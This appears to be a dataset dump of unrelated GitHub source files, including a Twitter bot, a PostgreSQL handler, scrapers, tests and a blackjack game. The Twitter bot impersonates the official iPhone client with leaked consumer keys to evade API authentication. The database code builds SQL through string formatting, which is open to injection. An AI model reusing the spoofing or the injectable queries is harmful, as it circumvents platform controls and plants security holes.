2, width_ratios=[3, 1])\n\n plt.subplot(gs[0])\n plot_main(f)\n plt.subplot(gs[1])\n plot_side(f)\n\n plt.subplots_adjust(wspace=0, left=0, right=1)\n plt.savefig(args.outfile, bbox_inches='tight')\n","repo_name":"peterkuma/clouds-ross-sea-2018","sub_path":"scripts/plot_cloud_incidence_by_phase.py","file_name":"plot_cloud_incidence_by_phase.py","file_ext":"py","file_size_in_byte":2960,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"10796698080","text":"import psycopg2\nimport config.config as dfc\n\nclass VideoTuple:\n#{\n insertproto = (\"INSERT INTO videos VALUES(DEFAULT, \"\n \"{}, '{}', '{}', {}, '{}', '{}', {})\")\n createsql = (\"\"\"CREATE TABLE videos (\n video_id SERIAL PRIMARY KEY,\n blk_id INTEGER NOT NULL,\n split VARCHAR(8) NOT NULL,\n vidname VARCHAR(32) NOT NULL,\n partition INTEGER NOT NULL,\n label VARCHAR(8) NOT NULL,\n origname VARCHAR(32),\n proc_flg BOOLEAN NOT NULL);\n CREATE INDEX ON videos (blk_id, split)\n \"\"\")\n\n def __init__(self, video_id=None, blk_id=None, split=None, vidname=None, \n partition=None, label=None, origname=None, preprocflg=False):\n #{\n self.video_id = video_id\n self.blk_id = blk_id\n self.split = split\n\n self.vidname = vidname\n self.partition = partition\n self.label = label\n self.origname = origname\n self.preprocflg = preprocflg\n #}\n\n def __repr__(self):\n return (f\"VideoTuple: {self.video_id}, {self.blk_id}, {self.split}, {self.vidname}, \"\n f\"{self.partition}, {self.label}, {self.origname}, {self.preprocflg}\")\n\n def insertsql(self): \n return VideoTuple.insertproto.format(\n self.blk_id, self.split, self.vidname, self.partition, \n self.label, self.origname, self.preprocflg)\n#}\n\nclass EpochTuple:\n#{\n insertproto = \"INSERT INTO epoch_queue VALUES(DEFAULT, {}, '{}', '{}')\"\n updateproto = (\"UPDATE epoch_queue SET status = '{}' WHERE epoch_id = {}\")\n haltsql = (\"SELECT COUNT(*) FROM epoch_queue WHERE status = 'HALT'\")\n createsql = (\"\"\" CREATE TABLE epoch_queue (\n epoch_id SERIAL PRIMARY KEY,\n blk_id INTEGER NOT NULL,\n split VARCHAR(8) NOT NULL,\n status VARCHAR(16) NOT NULL)\n \"\"\")\n\n def __init__(self, epoch_id=None, blk_id=None, split=None, status=None):\n self.epoch_id = epoch_id\n self.blk_id = blk_id\n self.split = split\n self.status = status\n\n def __repr__(self): \n return (f\"EpochTuple: {self.epoch_id}, {self.blk_id}, {self.split}, {self.status}\")\n\n def insertsql(self):\n return EpochTuple.insertproto.format(self.blk_id, self.split, self.status)\n\n def updatesql(self, status):\n return EpochTuple.updateproto.format(status, self.epoch_id)\n#}\n\nclass PostgreSqlHandle: \n#{\n def __init__(self, verbose=False): \n self._cursor = None\n self.dbconnection = None\n self.verbose = verbose\n \n def __enter__(self):\n #{\n self.dbconnection = None\n try:\n #{\n if self.verbose: print('Connecting to the PostgreSQL database...')\n self.dbconnection = psycopg2.connect(host=dfc.HOST, database=dfc.DATABASE,\n user=dfc.DBUSER, password=dfc.DBPASSWORD, port=dfc.DBPORT)\n \n # Validate connection\n self.cursor = self.dbconnection.cursor()\n self.cursor.execute('SELECT version()')\n version = self.cursor.fetchone()\n if self.verbose: print(f\"PostgreSQL version:\\n {version}\")\n #} \n except (Exception, psycopg2.DatabaseError) as error:\n print(\"PostgreSqlHandle::__enter__, ERROR:\", error)\n\n return self\n #}\n \n def __exit__(self, exception_type, exception_value, traceback):\n #{\n if self.cursor is not None:\n self.cursor.close(); self.cursor = None\n \n if self.dbconnection is not None:\n self.dbconnection.close(); self.dbconnection = None\n #}\n\n @property\n def cursor(self):\n if self._cursor is None and self.dbconnection is not None:\n self.cursor = self.dbconnection.cursor()\n return self._cursor\n\n @cursor.setter\n def cursor(self, value): \n self._cursor = value \n\n def sqlquery(self, sql, fetch=None):\n #{\n result = None\n try:\n self.cursor.execute(sql)\n if fetch == 'all': result = self.cursor.fetchall()\n elif fetch == 'one': result = self.cursor.fetchone()\n elif fetch is not None: result = self.cursor.fetchmany(fetch)\n self.dbconnection.commit()\n\n except (Exception, psycopg2.DatabaseError) as error:\n print(\"PostgreSqlHandle::sqlquery, ERROR:\", error)\n\n return result\n #}\n\n def initialize_database(self):\n #{\n try:\n #{\n eexists = self.sqlquery(\"SELECT to_regclass('epoch_queue')\", fetch='one')[0] is not None\n vexists = self.sqlquery(\"SELECT to_regclass('videos')\", fetch='one')[0] is not None\n\n if eexists:\n count = self.sqlquery(\"SELECT COUNT(*) FROM epoch_queue\", fetch='one')[0]\n print(f\"WARNING: table 'epoch_queue' already exists with {count} rows.\")\n \n if vexists:\n count = self.sqlquery(\"SELECT COUNT(*) FROM videos\", fetch='one')[0]\n print(f\"WARNING: table 'videos' already exists with {count} rows.\")\n\n usrrsp = 'y'\n if eexists or vexists: usrrsp = input(f\"Are you sure you want reinitialize this database?\\n[N/y]\")\n if usrrsp.lower() != 'y': print(\"Database initialization operation aborted.\"); return False\n \n print(\"\\nCommencing database initialization...\")\n if vexists: self.cursor.execute(\"DROP TABLE videos\")\n if eexists: self.cursor.execute(\"DROP TABLE epoch_queue\")\n self.cursor.execute(EpochTuple.createsql)\n self.cursor.execute(VideoTuple.createsql)\n self.dbconnection.commit()\n print(\"Database initialization complete.\")\n #}\n except (Exception, psycopg2.DatabaseError) as error:\n print(\"PostgreSqlHandle::initialize_database, ERROR:\", error)\n return False\n \n return True\n #}\n\n def populate_database(self, vtrains, vvalids):\n #{\n try:\n print(\"\\nCommencing database population...\")\n for vt in vtrains: self.cursor.execute(vt.insertsql())\n for vv in vvalids: self.cursor.execute(vv.insertsql())\n self.dbconnection.commit()\n print(\"Database population complete.\\n\")\n\n except (Exception, psycopg2.DatabaseError) as error:\n print(\"PostgreSqlHandle::populate_database, ERROR:\", error)\n #}\n#}\n","repo_name":"ajdonich/deepfake-detector","sub_path":"deepfake/postgresdb.py","file_name":"postgresdb.py","file_ext":"py","file_size_in_byte":6636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"421699012","text":"import dump_load\nimport requests\nimport sys\n\n\nclass King(object):\n # 设置请求头,url, 请求参数\n def __init__(self,word):\n self.url = 'http://fy.iciba.com/ajax.php?a=fy'\n self.headers = {\n \"User-Agent\": \"Mozilla / 5.0(Windows NT 10.0;WOW64) AppleWebKit \"\n \"/ 537.36(KHTML, likeGecko) Chrome / 65.0.3325.181Safari / 537.36\"\n }\n self.post_data = {\n \"f\": \"auto\",\n \"t\": \"auto\",\n \"w\": word\n }\n\n # 发送请求取得数据\n def get_data(self):\n res = requests.post(url=self.url,headers=self.headers,data=self.post_data)\n return res.content.decode()\n\n # 解析数据\n def parse_data(self,data):\n # 将json字符串转换为python字典\n dict_data = dump_load.loads(data)\n try:\n result = dict_data['content']['out']\n except:\n result = dict_data['content']['word_mean']\n\n print(type(dict_data))\n print(result)\n\n def run(self):\n data = self.get_data()\n self.parse_data(data)\n\nif __name__ == '__main__':\n # word = input('想查啥:')\n # a = King(word)\n # print(type(a.get_data()))\n # print(a.get_data())\n # a.run()\n\n # print(sys.argv)\n word = sys.argv[1]\n king = King(word)\n king.run()","repo_name":"ioscarry/JXWY_PLUS","sub_path":"cidian/cidian.py","file_name":"cidian.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17609779442","text":"# 面试题21:调整数组顺序使奇数位于偶数前面\ndef reorder_odd_even(array):\n if not array:\n return\n i = 0\n j = len(array) - 1\n while i < j:\n if i < j and not isEven(array[i]):\n i += 1\n if i < j and isEven(array[j]):\n j -= 1\n tmp = array[i]\n array[i] = array[j]\n array[j] = tmp\n return array\n\ndef isEven(n:int):\n return (n & 1) == 0\n\nif __name__ == '__main__':\n unorder_array = [1, 2, 3, 4, 5, 6, 7]\n print(reorder_odd_even(unorder_array))","repo_name":"Real-Chen/Coding-Interviews","sub_path":"21_reorder_array.py","file_name":"21_reorder_array.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33948651141","text":"from urllib.request import urlopen\nfrom bs4 import BeautifulSoup\n\nhtml = urlopen('http://www.gov.cn/')\nbs = BeautifulSoup(html.read(), 'html.parser')\ninfo = bs.findAll('div', {'class': 'column1'})\n\nfor i in info:\n info_text = i.get_text()\n print(info_text)\n","repo_name":"wangsc801/note","sub_path":"Python/crawler/bs4__find_by_class.py","file_name":"bs4__find_by_class.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30091088915","text":"# Code inspired and based on @fourtonfish 's script\n# Code can be found here : https://gist.github.com/fourtonfish/5ac885e5e13e6ca33dca9f8c2ef1c46e\n\n# Importing libraries\nfrom twitter import *\nimport json\nimport rethinkdb as r\n\n# Importing modules\nfrom modules import handler\n\n# Guide on how to get your tokens\n# The IPHONE key and secret can be found here : https://gist.github.com/shobotch/5160017\n# These tokens have to be \"official\" tokens to spoof the oauth process.\n#\n# Then on how to get your personnal access token and secret, You have to\n# use the PIN based authentication (https://dev.twitter.com/oauth/pin-based) with the IPHONE's\n# key and secret You can use : http://npmjs.com/package/twitter-pin-auth to do that\n# Then use the token and secret that you get from it by connecting with your \"bot\" account\n# Then store them in a .json file named credentials.json\n\n# Loads the credentials from a json file in order to use them in Oauth\nwith open('credentials.json') as config_credentials:\n CREDENTIALS = json.load(config_credentials)\n\n ACCESS_TOKEN = CREDENTIALS['ACCESS_TOKEN']\n ACCESS_TOKEN_SECRET = CREDENTIALS['ACCESS_TOKEN_SECRET']\n IPHONE_CONSUMER_KEY = CREDENTIALS['IPHONE_CONSUMER_KEY']\n IPHONE_CONSUMER_SECRET = CREDENTIALS['IPHONE_CONSUMER_SECRET']\n\n\n# Setting up connection to the database\n# https://www.rethinkdb.com/docs/guide/python/ for more informations\nwith open('config.json') as config_db:\n DB_CONFIG = json.load(config_db)\n\n PORT = DB_CONFIG['PORT']\n HOST = DB_CONFIG['HOST']\n\n r.connect(HOST, PORT).repl()\n\n\n# Spoofing requests to twitter\nclass SpoofOAuth(OAuth):\n def __init__(self, *args, **kwargs):\n OAuth.__init__(self, *args, **kwargs)\n\n def generate_headers(self):\n # note: the X-Twitter fields may not actually be necessary\n hdr = {\n 'User-Agent':\n 'Twitter-iPhone/6.45 iOS/9.0.2 (Apple;iPhone8,2;;;;;1)',\n 'X-Twitter-Client': 'Twitter-iPhone',\n 'X-Twitter-API-Version': '5',\n 'X-Twitter-Client-Language': 'en',\n 'X-Twitter-Client-Version': '6.45',\n }\n return hdr\n\n\n# Generating \"fake\" Oauth\nauth = SpoofOAuth(ACCESS_TOKEN, ACCESS_TOKEN_SECRET, IPHONE_CONSUMER_KEY, IPHONE_CONSUMER_SECRET)\n\n\n# Connecting to APIs\napi = Twitter(auth=auth)\ncaps_api = Twitter(domain='caps.twitter.com', api_version='v2', auth=auth)\n\n# Actual bot code situated in ./modules/handler.py\nhandler.cycle(api=api, caps_api=caps_api, r=r)\n","repo_name":"mdolr/legi-bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21457663180","text":"\"\"\"Tests for assess_juju_sync_tools module.\"\"\"\n\nimport os\n\nfrom mock import (\n call,\n patch,\n )\nfrom assess_juju_sync_tools import (\n assert_file_version_matches_agent_version,\n verify_agent_tools,\n get_agent_version,\n parse_args,\n )\nfrom tests import (\n TestCase,\n )\nfrom utility import (\n JujuAssertionError,\n )\nfrom jujupy import (\n fake_juju_client,\n )\n\n\nclass TestParseArgs(TestCase):\n\n def test_common_args(self):\n args = parse_args([\"an-env\", \"/bin/juju\", \"/tmp/logs\", \"an-env-mod\"])\n self.assertEqual(\"an-env\", args.env)\n self.assertEqual(\"/bin/juju\", args.juju_bin)\n self.assertEqual(\"/tmp/logs\", args.logs)\n self.assertEqual(\"an-env-mod\", args.temp_env_name)\n self.assertEqual(False, args.debug)\n\n\nclass TestAssertFileVersionMatchesAgentVersion(TestCase):\n def test_assert_file_version_matches_agent_version_valid(self):\n for version in [(\"juju-2.0.1-xenial-amd64.tgz\", \"2.0.1\"),\n (\"juju-2.1-beta1-zesty-amd64.tgz\", \"2.1-beta1\"),\n (\"juju-2.0-rc2-arch-series.tgz\", \"2.0-rc2\"),\n (\"juju-2.0-xenial-amd64.tgz\", \"2.0\"),\n (\"juju-2.1-rc1-win10-amd64.tgz\", \"2.1-rc1\")]:\n assert_file_version_matches_agent_version(\n version[0], version[1])\n\n def test_raises_exception_when_versions_dont_match(self):\n for version in [(\"juju-2.0.1-xenial-amd64.tgz\", \"2.2.1\"),\n (\"juju-2.0-rc2-arch-series.tgz\", \"2.1\"),\n (\"juju-2.1-rc1-win10-amd64.tgz\", \"2.1-rc2\"),\n (\"juju-2.0-rc2-arch-series.tgz\", \"2.0\"),\n (\"juju-2.0-arch-series.tgz\", \"2.0-rc1\"),\n (\"juju-2.0.1-arch-series.tgz\", \"2.0\"),\n (\"juju-2.0.1-arch-series.tgz\", \"2.0.2\"),\n (\"juju-2.1-beta1-arch-series.tgz\", \"2.1-beta\"),\n (\"juju-1.25-win-x86.tgz\", \"1.25.0\")]:\n with self.assertRaises(JujuAssertionError):\n assert_file_version_matches_agent_version(\n version[0], version[1])\n\n\nclass TestAgentVersion(TestCase):\n def test_get_agent_version(self):\n for version in [(\"1.25-arch-series\", \"1.25\"),\n (\"2.0-rc2-arch-series\", \"2.0-rc2\"),\n (\"2.0.2-rc2-arch-series\", \"2.0.2-rc2\"),\n (\"2.1-beta12-arch-series\", \"2.1-beta12\"),\n (\"2.1.1-beta1-arch-series\", \"2.1.1-beta1\"),\n (\"2.0-arch-series\", \"2.0\"),\n (\"2.0.1-arch-series\", \"2.0.1\")]:\n client = fake_juju_client(version=version[0])\n agent_version = get_agent_version(client)\n self.assertEquals(agent_version, version[1])\n\n\nclass TestVerifyAgentTools(TestCase):\n def test_doesnt_raise_on_match_version(self):\n with patch.object(os, 'listdir') as lstdir:\n lstdir.return_value = [\n 'juju-2.0.1-centos7-amd64.tgz',\n 'juju-2.0.1-precise-amd64.tgz',\n 'juju-2.0.1-win2016-amd64.tgz']\n verify_agent_tools(\"/path/to/agentsfiles\", \"2.0.1\")\n self.assertIn(\"juju sync-tool verification done successfully\",\n self.log_stream.getvalue())\n\n def test_ignores_none_tgz_files_on_verify_agent_tool(self):\n juju_bin_ver = \"2.0.1\"\n with patch(\"assess_juju_sync_tools.\"\n \"assert_file_version_matches_agent_version\") as asm:\n with patch.object(os, 'listdir') as lstdir:\n lstdir.return_value = [\n 'juju-2.0.1-centos7-amd64.tgz',\n 'juju-2.0.1-precise-amd64.tgz',\n 'juju-2.0.1-win2016-amd64.tgz',\n 'juju-2.0.1-win2016-amd64.txt']\n verify_agent_tools(\"/path/to/agentsfiles\", juju_bin_ver)\n calls = [call('juju-2.0.1-centos7-amd64.tgz', juju_bin_ver),\n call('juju-2.0.1-precise-amd64.tgz', juju_bin_ver),\n call('juju-2.0.1-win2016-amd64.tgz', juju_bin_ver)]\n self.assertEquals(asm.call_count, 3)\n self.assertListEqual(asm.call_args_list, calls)\n\n def test_raise_assertion_on_mismatch_version(self):\n juju_bin_ver = \"2.0.1\"\n with patch.object(os, 'listdir') as lstdir:\n lstdir.return_value = [\n 'juju-2.0.2-centos7-amd64.tgz',\n 'juju-2.0.1-precise-amd64.tgz',\n 'juju-2.0.1-win2016-amd64.tgz']\n with self.assertRaises(JujuAssertionError):\n verify_agent_tools(\"foo\", juju_bin_ver)\n","repo_name":"juju/1.25-upgrade","sub_path":"juju2/acceptancetests/tests/test_assess_juju_sync_tools.py","file_name":"test_assess_juju_sync_tools.py","file_ext":"py","file_size_in_byte":4727,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"1962081719","text":"\"\"\"This script contains simple Telegram Bot which sends messages to Telegram\"\"\"\n\nfrom urllib.parse import urljoin\n\nimport requests\n\nfrom application.my_handler import MyHandler\nfrom application.utils import unjsonify, generate_token\nfrom settings import get_service_url\n\n\nclass AppHandler(MyHandler):\n _chats = {}\n _tokens = {}\n\n def _make_error_response(self):\n self.make_response(code=400, headers=dict({'Content-Type': 'application/json'}),\n json={'error': 'bad request'})\n\n def do_GET(self):\n if self.path == '/':\n self.make_response(code=200, headers=dict({'Content-Type': 'application/json'}),\n json={'hello': 'client', \"I'm\": 'application'})\n else:\n self._make_error_response()\n\n def do_POST(self):\n if self.path == '/send':\n try:\n content_length = int(self.headers['Content-Length'])\n post_data = self.rfile.read(content_length)\n obj = unjsonify(post_data)\n token = obj['token']\n message = str(obj['message'])\n headers = {}\n if 'Authorization' in self.headers:\n headers['Authorization'] = self.headers['Authorization']\n response = requests.post(urljoin(get_service_url(), '/sendMessage'),\n headers=headers,\n json={'chat_id': self._chats[token],\n 'text': message})\n self.make_response(code=response.status_code, headers=dict(response.headers),\n data=response.text.encode())\n return\n except (ValueError, KeyError) as e:\n print(e.__traceback__)\n self._make_error_response()\n\n def do_PUT(self):\n if self.path == '/tokens':\n try:\n content_length = int(self.headers['Content-Length'])\n data = self.rfile.read(content_length)\n obj = unjsonify(data)\n chat_id = obj['chat_id']\n token = self._tokens.get(chat_id, None)\n if token is None:\n token = generate_token()\n self._tokens[chat_id] = token\n self._chats[token] = chat_id\n self.make_response(code=200, headers=dict({'Content-Type': 'application/json'}),\n json={'token': token})\n return\n except (ValueError, KeyError) as e:\n print(e.__traceback__)\n self._make_error_response()\n","repo_name":"vessellook/2020-1-Atom-QA-Python-A-Vessellook","sub_path":"hw6/code/application/app_handler.py","file_name":"app_handler.py","file_ext":"py","file_size_in_byte":2686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40892571553","text":"import simulated\n\n\n# Class to represent a maxterm.\n# Maxterm holds configuration about everz variable. It can be in three distinct states\n# 0 - variable not present in maxterm\n# 1 - variable present\n# -1 - variable present and negated\nclass Maxterm:\n # Constructor of maxterm\n def __init__(self, number_of_variables):\n self.number_of_variables = number_of_variables\n self.configuration = [0] * (number_of_variables + 1) # configuration[0] is a dummy for a cleaner code\n self.configuration[0] = -420\n\n # Get variable set in format -3 (non C)\n def set(self, variable):\n if abs(variable) > (self.number_of_variables + 1):\n print(\"Cound not set a variable not present for this instance!\")\n return False\n\n if variable >= 1:\n # Set to 1 -- Variable is present\n self.configuration[variable] = 1\n elif variable <= -1:\n # Set to -1 -- Variable is present AND NEGATED\n self.configuration[abs(variable)] = -1\n else:\n print(\"Found zero. This shoud be the end of line.\")\n return False\n\n # print(self.configuration)\n\n return True\n\n # For listing things inside instance\n def __repr__(self):\n complete_string = \"(\"\n first = True\n for i in range(0, self.number_of_variables + 1):\n if self.configuration[i] == 1:\n if first:\n complete_string += \"%d\" % (i)\n first = False\n continue\n complete_string += \" ∨ %d\" % (i)\n elif self.configuration[i] == -1:\n if first:\n complete_string += \"¬%d\" % (i)\n first = False\n continue\n complete_string += \" ∨ ¬%d\" % (i)\n\n complete_string += \")\"\n return complete_string\n\n # Is the maxterm satisfied?\n def isSatisfiedWith(self, configuration):\n result = False\n\n j = -1\n for variable in self.configuration:\n j += 1\n if (variable == -420) or (variable == 0):\n continue\n elif variable == 1:\n # print(\"%r or %r\" % (configuration[j], result))\n result = configuration[j] or result\n elif variable == -1:\n # print(\"%r or %r\" % (not configuration[j], result))\n result = (not configuration[j]) or result\n\n return result\n\n # Return Maxterm variables\n def getVars(self):\n vars_of_maxterm = set()\n j = -1\n for var in self.configuration:\n j += 1\n if (var == -420) or (var == 0):\n continue\n elif (var == 1) or (var == -1):\n # print(\"Adding %d to set.\" % (j))\n vars_of_maxterm.add(j)\n\n return vars_of_maxterm\n\n\nclass CNFInstance:\n # Constructor of CNFInstance\n def __init__(self, id, number_of_variables):\n self.id = id\n self.number_of_variables = number_of_variables\n self.expecting_maxterms = -1\n self.number_of_maxterms = 0\n self.number_of_weights_set = 0\n\n self.weight_of_variables = [-1] * (\n number_of_variables + 1) # weight_of_variables[0] is a dummy for cleaner code\n self.weight_of_variables[0] = -420\n self.maxterm_array = []\n\n self.best_weight = -1\n self.best_solution = [-420] # Dummy on the [0] for consistence\n self.solved = False\n self.time = 0\n self.given_best_weight = -1\n self.given_best_solution = [-420] # Dummy on the [0] for consistence\n\n def addMaxterm(self, maxterm):\n if maxterm.number_of_variables != self.number_of_variables:\n print(\"Could not maxterm with different number of variables!\")\n return False\n self.maxterm_array.append(maxterm)\n self.number_of_maxterms += 1\n return True\n\n def setWeight(self, variable, weight):\n self.weight_of_variables[variable] = weight\n self.number_of_weights_set += 1\n return\n\n # For printing the instance\n def __str__(self):\n return \"=== CNF Instance nr.%d ===\\n\" \\\n \"Variables = %d\\n\" \\\n \"Weights = %s\\n\" \\\n \"Maxterm array = %s\\n\" \\\n \"Best weight = %d\\n\" \\\n \"Best solution = %s\" % (\n self.id, self.number_of_variables, self.weight_of_variables, self.maxterm_array, self.best_weight,\n self.best_solution)\n\n # Simulated annealing\n solve_sim = simulated.solve_sim\n","repo_name":"Smidra/KOP-ukol-5","sub_path":"classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":4631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29738179814","text":"# Simples jogo de Blackjack\n\nimport random\n\nclass Carta:\n naipes = {\"P\": \"Paus\", \n \"O\": \"Ouros\", \n \"E\": \"Espadas\", \n \"C\": \"Copas\"}\n \n valores = (False, \"Ás\", \"2\", \n \"3\", \"4\", \"5\", \"6\", \n \"7\", \"8\", \"9\", \"10\",\n \"Valete\", \"Dama\", \"Rei\")\n\n def __init__(self, naipe_carta: str, valor_carta: int):\n self.n = naipe_carta\n self.v = valor_carta\n \n def obter_valor(self) -> int:\n if (self.v < 11):\n return self.v\n else:\n return 10\n\n def __str__(self) -> str:\n return self.valores[self.v]+ \" de \" + self.naipes[self.n] \n \n\nclass Baralho:\n def __init__(self):\n self.criar_cartas()\n self.num_cartas = len(self.cartas)\n \n def criar_cartas(self):\n self.cartas = []\n naipes = ('P', 'O', 'E', 'C')\n\n for n in naipes: # Paus, Ouros, Espadas, Copas\n for v in range(1, 14): # Ás, 2, ..., 10, Valete, Dama, Rei\n self.cartas.append(Carta(n, v))\n \n def retirar_carta(self):\n n = random.randint(0, self.num_cartas-1)\n carta = self.cartas.pop(n)\n self.num_cartas -= 1\n return carta\n\n\nclass Jogador:\n def __init__(self):\n self.montante = self.pedir_montante_inicial()\n self.cartas = []\n self.pontos = 0\n self.aposta = 0\n self.retirar = True\n\n def pedir_montante_inicial(self):\n return float(input(\"\\nQual o teu montante inicial? \"))\n\n def acrescentar_dinheiro(self, valor):\n self.montante += valor\n\n def retirar_dinheiro(self, valor):\n self.montante -= valor\n \n def pedir_valor_aposta(self):\n aposta = int(input(\"\\nVamos começar uma rodada. Qual o valor da tua aposta? \"))\n\n while (aposta > self.montante):\n aposta = int(input(\"\\nNão tens montante suficiente. Qual o valor da tua aposta? \"))\n\n self.retirar_dinheiro(aposta)\n self.aposta = aposta\n\n return aposta\n \n def adicionar_carta(self, c):\n if (self.retirar):\n print(\"\\n-> Tu foste buscar uma carta.\")\n self.cartas.append(c)\n self.atualizar_pontos()\n else:\n print(\"\\n-> Não foste buscar nenhuma carta.\")\n \n def atualizar_pontos(self):\n pontos = 0\n num_ases = 0\n # pontuação sem ases\n for c in self.cartas:\n if (c.obter_valor() == 1):\n num_ases += 1\n else:\n pontos += c.obter_valor() \n \n # verificar pontuação dos ases \n if (num_ases > 0 and pontos + 11 + num_ases-1 <= 21):\n pontos += 11 + num_ases-1\n \n else:\n pontos += num_ases\n \n self.pontos = pontos\n \n def terminar_rodada(self):\n self.cartas = []\n self.pontos = 0\n self.aposta = 0\n self.retirar = True\n \n def __str__(self):\n string = \"\\n-- As tuas cartas --\\n\" \n for c in self.cartas:\n string += '** '\n string += c.__str__() \n string += ' **\\n'\n \n return string[:-1]\n \n \nclass Dealer:\n def __init__(self):\n self.cartas = []\n self.pontos = 0\n self.retirar = True\n\n def adicionar_carta(self, c):\n if (self.retirar):\n if (self.pontos < 18):\n print(\"\\n-> O dealer foi buscar uma carta.\") \n self.cartas.append(c)\n self.atualizar_pontos()\n else: \n print(\"\\n-> O dealer não foi buscar nenhuma carta.\")\n self.retirar = False\n \n def atualizar_pontos(self):\n pontos = 0\n num_ases = 0\n # pontuação sem ases\n for c in self.cartas:\n if (c.obter_valor() == 1):\n num_ases += 1\n else:\n pontos += c.obter_valor() \n \n # verificar pontuação dos ases\n if (num_ases > 0 and pontos + 11 + num_ases-1 <= 21):\n pontos += 11 + num_ases-1\n \n else:\n pontos += num_ases\n \n self.pontos = pontos\n \n def revelar_baralho(self):\n string = \"\\n-- Cartas que o dealer tinha --\\n\" \n for c in self.cartas:\n string += '** '\n string += c.__str__() \n string += ' **\\n'\n \n return string[:-1]\n \n def __str__(self):\n string = \"\\n-- Cartas do dealer --\\n\" \n for c in self.cartas[1:]:\n string += '** '\n string += c.__str__() \n string += ' **\\n'\n string += \"** CARTA SECRETA **\\n\"\n \n return string[:-1]\n \n\nclass Rodada:\n def __init__(self, aposta: int, jogador: Jogador):\n self.aposta = aposta\n self.jogador = jogador\n self.dealer = Dealer()\n self.baralho = Baralho()\n self.distribuir_cartas()\n \n def distribuir_cartas(self):\n # 1 carta para cada\n self.jogador.adicionar_carta(self.baralho.retirar_carta())\n self.dealer.adicionar_carta(self.baralho.retirar_carta())\n \n # 2 cartas para cada\n self.jogador.adicionar_carta(self.baralho.retirar_carta())\n self.dealer.adicionar_carta(self.baralho.retirar_carta())\n \n print(self.dealer.__str__())\n print(self.jogador.__str__())\n \n self.verificar_pontuacoes()\n \n def verificar_pontuacoes(self):\n pontos_jogador = self.jogador.pontos\n pontos_dealer = self.dealer.pontos\n \n if (pontos_jogador == 21):\n if (pontos_dealer == 21):\n self.empate()\n self.terminar_jogo()\n else:\n self.blackjack_do_jogador()\n self.terminar_jogo()\n \n elif (pontos_jogador > 21):\n if (pontos_dealer > 21):\n self.empate()\n self.terminar_jogo()\n else:\n self.dealer_venceu()\n self.terminar_jogo()\n else:\n self.tirar_mais_cartas()\n \n \n def tirar_mais_cartas(self):\n pontos_jogador = self.jogador.pontos\n\n if (self.jogador.retirar):\n resposta = input(\"\\nTens \" + str(pontos_jogador) + \" pontos. Desejas tirar mais cartas? (s, n): \")\n \n while (resposta not in ('S', 'N', 's', 'n')):\n resposta = input(\"\\nNão percebi. Desejas tirar mais cartas? (s, n): \")\n else:\n resposta = 'n'\n \n if (resposta == 'S' or resposta == 's'):\n self.nova_jogada()\n \n elif (resposta == 'N' or resposta == 'n'):\n self.jogador.retirar = False\n \n if (self.dealer.retirar):\n self.nova_jogada()\n else:\n self.verificar_vencedor()\n\n \n def empate(self):\n print(\"\\nHOUVE UM EMPATE. Vamos devolver-te o dinheiro que apostaste.\")\n self.jogador.acrescentar_dinheiro(self.aposta)\n \n def dealer_venceu(self):\n print(\"\\nO DEALER VENCEU.\")\n \n def jogador_venceu(self):\n print(\"\\nGANHASTE!!!\")\n self.jogador.acrescentar_dinheiro(2*self.aposta)\n \n def blackjack_do_jogador(self):\n print(\"\\nBLACKJACK!!! GANHASTE!!!\")\n self.jogador.acrescentar_dinheiro(2.5*self.aposta)\n \n def nova_jogada(self):\n # tirar mais uma carta\n self.jogador.adicionar_carta(self.baralho.retirar_carta())\n self.dealer.adicionar_carta(self.baralho.retirar_carta())\n \n print(self.dealer.__str__())\n print(self.jogador.__str__())\n \n self.verificar_pontuacoes()\n \n def verificar_vencedor(self):\n pontos_jogador = self.jogador.pontos\n pontos_dealer = self.dealer.pontos\n \n if (pontos_dealer > 21):\n self.jogador_venceu()\n \n elif (pontos_jogador > pontos_dealer):\n self.jogador_venceu()\n \n elif (pontos_jogador == pontos_dealer):\n self.empate()\n \n else:\n self.dealer_venceu()\n \n self.terminar_jogo()\n \n def terminar_jogo(self):\n # verificar quem venceu\n pontos_jogador = self.jogador.pontos\n pontos_dealer = self.dealer.pontos\n \n print(\"\\nO dealer ficou com\", pontos_dealer, \"pontos.\")\n print(self.dealer.revelar_baralho())\n\n print(\"\\nTu ficaste com\", pontos_jogador, \"pontos.\")\n print(self.jogador.__str__())\n \n self.jogador.terminar_rodada()\n\n\ndef blackjack():\n print(\"Bem-vindo ao jogo BLACKJACK!\")\n \n jogador = Jogador()\n\n if (jogador.montante <= 0.0):\n print(\"\\nNão tens dinheiro. :(\")\n return\n \n continuar = 1\n while (continuar):\n print(\"\\nTens\", jogador.montante, \"moedas.\")\n \n aposta = jogador.pedir_valor_aposta()\n\n Rodada(aposta, jogador)\n \n if (jogador.montante == 0):\n print(\"\\nFicaste sem dinheiro. :(\")\n break\n \n resposta = input(\"\\nQueres continuar a jogar? (s, n): \")\n \n while (resposta not in ['S', 'N', 's', 'n']):\n resposta = input(\"\\nNão percebi. Queres continuar a jogar? (s, n): \")\n \n if (resposta == 'S' or resposta == 's'):\n continuar = 1\n elif (resposta == 'N' or resposta == 'n'):\n continuar = 0\n \n print(\"\\nFim do jogo!\\n\")\n \n\nif __name__ == \"__main__\":\n\n blackjack()\n 